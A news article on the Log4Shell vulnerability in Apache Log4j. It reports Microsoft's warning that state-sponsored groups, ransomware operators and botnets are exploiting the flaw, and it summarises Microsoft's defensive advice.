Log4j Threat Worsens As Microsoft Warns Of Multiple State-Sponsored Hackers On The Warpath
In case you weren't yet taking the Log4shell vulnerability in Apache's Log4J seriously, here's another reason to do so: threat actors associated with malware distributors, ransomware-as-a-service vendors, and even nation-states are actively exploiting the flaw. Bad guys are scanning the web en masse looking for unpatched systems, and if you're running a server with an unpatched Log4j, they're likely to find it sooner than later.
This bit of information comes straight from Microsoft, which updated its guidance on the flaw yesterday. The article, originally posted on Saturday when the flaw hit the mainstream, was updated yesterday to include information about active, ongoing threats that are attempting to exploit the flaw, as well as some further guidance to help defend against those specific threats.
Microsoft calls out China, Iran, North Korea, and Turkey as the nation-states exploiting the security hole, although the US company is careful to explain that activity from the nations ranges from "experimentation during development" through "exploitation against targets to achieve the actor's objectives." In other words, some of these countries might simply be probing the flaw as part of security testing, others are integrating the flaw into their existing hacker toolkits, and still others are actively attempting to use it right now.
The Microsoft Threat Intelligence Center (MSTIC) notes more specifically that it has observed Iran's PHOSPHOROUS group, known for deploying ransomware, "acquiring and creating modifications" of the exploit, while the Chinese threat actor HAFNIUM has been using the vulnerability to "attack virtualization infrastructure." Microsoft says HAFNIUM operators are using "a DNS service typically associated with testing" to fingerprint systems.
The company goes on to mention that existing malware campaigns and botnets are already making heavy use of the exploit. Mirai, one of the largest extant botnets, has apparently been retrofitted with the ability to target the flaw. Likewise, folks who were targeting Elasticsearch have moved over to Log4shell to deploy crypto-miner malware. The house that Bill and Paul built says that the Tsunami backdoor for Linux is seeing a resurgence, too. Log4j is a Java application, and Java is multi-platform, after all. Attacks can be configured using Base64 commands in the request to simultaneously target shell scripts on Linux and Powershell commands on Windows.
As far as prevention goes, Microsoft naturally recommends that its customers make use of its security tools, particularly Microsoft Defender Antivirus and Anti-malware. Folks who use Microsoft Defender for Endpoint can enable a specific rule—"block executable files from running unless they meet a prevalence, age, or trusted list criterion"—to help mitigate the effects of the flaw.
However, because this flaw is so serious, and so prevalent, Microsoft actually recommends most of its customers to look for signs that they have already been exploited "rather than fully relying on prevention." The old saying goes that an ounce of prevention is worth a pound of cure, but it seems in this case—much like with the recent pandemic—prevention is almost impossible, so it's best to move on to the next step. You can read the rest of Microsoft's guidance at its blog.
